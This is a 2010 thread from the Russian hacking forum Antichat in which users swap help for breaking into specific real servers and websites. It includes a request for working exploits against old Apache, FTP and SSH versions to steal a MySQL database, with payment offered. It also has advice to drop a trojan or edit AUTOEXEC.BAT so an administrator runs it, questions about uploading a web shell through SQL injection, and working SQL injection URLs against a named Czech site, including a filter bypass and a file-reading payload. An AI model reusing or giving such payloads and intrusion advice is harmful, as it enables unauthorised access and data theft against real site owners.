Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|

13.06.2010, 19:32
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме: 2459557
Репутация:
606
|
|
Сообщение от qq6ka
актуально.
Смотря какой вебсервер. Если Apache, то обычно его пускают от системного юзверя - можно телнет открыть или даже RemoteDesctop. Если IIS, то права обычно обрезаны по максимуму, а новых сплойтов почти и нет в паблике.
|
|
|

13.06.2010, 19:57
|
|
Познающий
Регистрация: 21.05.2010
Сообщений: 37
Провел на форуме: 167126
Репутация:
55
|
|
Сообщение от попугай
Смотря какой вебсервер. Если Apache, то обычно его пускают от системного юзверя - можно телнет открыть или даже RemoteDesctop. Если IIS, то права обычно обрезаны по максимуму, а новых сплойтов почти и нет в паблике.
Microsoft-IIS/6.0
Правки файлов сайтов нет. Могу диски смотреть, править файлы в корне C:\. Всё через ж***, короче.
|
|
|

13.06.2010, 20:12
|
|
Познающий
Регистрация: 16.04.2009
Сообщений: 81
Провел на форуме: 1096131
Репутация:
45
|
|
Apache/1.3.27 (Unix) (Red-Hat/Linux) FrontPage/5.0.2.2626 mod_ssl/2.8.12 OpenSSL/0.9.6b PHP/4.3.11 mod_perl/1.27 - вот такая система есть у меня. Апач довольно старый, подозреваю, что есть сплойты под него. Только найти не могу.
фтп - Version wu-2.6.2(1)
ssh - SSH-1.99-OpenSSH_3.1p1
подкиньте идейку или рабочий сплойт. В идеале мне нужна MySQL база, но мскл инъекций на сайте не обнаружено. Если достану базу - отблагодарю
|
|
|

13.06.2010, 20:26
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме: 2459557
Репутация:
606
|
|
Сообщение от qq6ka
Microsoft-IIS/6.0
Правки файлов сайтов нет. Могу диски смотреть, править файлы в корне C:\. Всё через ж***, короче.
Попробуй в корень диска C:/ троян записать. Вдруг админ решит запустить. Или autoexec поправить.
|
|
|

13.06.2010, 20:37
|
|
Новичок
Регистрация: 12.05.2010
Сообщений: 10
Провел на форуме: 37183
Репутация:
0
|
|
подскажите пожалуйста как залить шелл.
ситуация такая: mysql стоит на одной машинке, сайт на другой (хостинг) - есть sql-inj дырка. INTO OUTFILE применить не получится исходя из выше-сказанного (mysql на отдельной машине).
по крайней мере пытался, но пишет:
Error 1: Can't create/write to file '/var/www/пам/data/www/парам/uploads/shell.php' (Errcode: 2)
Последний раз редактировалось exT1ma4ka; 13.06.2010 в 20:42..
|
|
|

13.06.2010, 20:37
|
|
Участник форума
Регистрация: 19.08.2009
Сообщений: 115
Провел на форуме: 111014
Репутация:
8
|
|
Фильтруется select, как обойти?
http://www.albumband.cz/pisen.php?id=1+union+select+1,2,3,4,5,6,7+--+
|
|
|

13.06.2010, 20:42
|
|
Познающий
Регистрация: 21.05.2010
Сообщений: 37
Провел на форуме: 167126
Репутация:
55
|
|
Сообщение от попугай
Попробуй в корень диска C:/ троян записать. Вдруг админ решит запустить. Или autoexec поправить.
Ну в теории можно залить ***.exe в веб-папку + правка C:\AUTOEXEC.BAT возможна. Только это нужно троя искать/покупать не палящегося + заставить админа перезагрузить сервер.
Попугай, тебе не нужен шелл? Мне лень возиться.
|
|
|

13.06.2010, 20:53
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме: 9220514
Репутация:
3338
|
|
Сообщение от FlaktW
Фильтруется select, как обойти?
http://www.albumband.cz/pisen.php?id=1+union+select+1,2,3,4,5,6,7+--+
select не фильтруется:
Код:
http://www.albumband.cz/pisen.php?id=1+and+substring((select+version()),1,1)=5
фильтруется кое-что другое 
|
|
|

13.06.2010, 23:18
|
|
Reservists Of Antichat - Level 6
Регистрация: 12.06.2008
Сообщений: 157
Провел на форуме: 3217552
Репутация:
1668
|
|
Сообщение от FlaktW
Фильтруется select, как обойти?
http://www.albumband.cz/pisen.php?id=1+union+select+1,2,3,4,5,6,7+--+
Код:
http://www.albumband.cz/pisen.php?id=-1+union%0aselect+1,version(),3,4,5,6,7,8
upd: + читалка файлов в 8 поле
Код:
http://www.albumband.cz/pisen.php?id=-1+union%0aselect+1,version(),3,4,5,6,7,0x2e2e2f706973656e2e706870
__________________
Avant que l'ombre...
Последний раз редактировалось RulleR; 13.06.2010 в 23:23..
|
|
|

14.06.2010, 12:23
|
|
Участник форума
Регистрация: 19.08.2009
Сообщений: 115
Провел на форуме: 111014
Репутация:
8
|
|
Сообщение от RulleR
Код:
http://www.albumband.cz/pisen.php?id=-1+union%0aselect+1,version(),3,4,5,6,7,8
upd: + читалка файлов в 8 поле
Код:
http://www.albumband.cz/pisen.php?id=-1+union%0aselect+1,version(),3,4,5,6,7,0x2e2e2f706973656e2e706870
Буду обращаться к вам за советами.
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|